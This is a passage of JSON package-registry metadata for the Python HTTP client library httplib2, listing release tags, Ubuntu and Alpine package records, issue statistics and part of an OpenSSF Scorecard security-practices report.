"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T14:22:36.082Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/python-httplib2?arch=source\u0026distro=ubuntu-22.04\u0026repository_url=https://launchpad.net/ubuntu/jammy","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/python-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/python-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/python-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages/python-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages/python-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages/python-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages/python-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages/python-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages/python-httplib2/codemeta","maintainers":[],"registry":{"name":"ubuntu-22.04","url":"https://launchpad.net/ubuntu/jammy","ecosystem":"ubuntu","default":false,"packages_count":34289,"maintainers_count":0,"namespaces_count":4,"keywords_count":1498,"github":"ubuntu","metadata":{"codename":"jammy","funded_packages_count":976},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:46.486Z","updated_at":"2026-08-25T05:06:47.665Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/namespaces"}},{"id":6068501,"name":"py-httplib2","ecosystem":"alpine","description":"Python HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2019-05-05T17:04:35.000Z","latest_release_published_at":"2019-05-05T17:04:35.000Z","latest_release_number":"0.12.1-r1","last_synced_at":"2026-03-08T18:56:32.087Z","created_at":"2023-01-31T19:25:51.033Z","updated_at":"2026-08-21T14:22:36.075Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.10/main/x86_64/py-httplib2","install_command":"apk add py-httplib2","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: 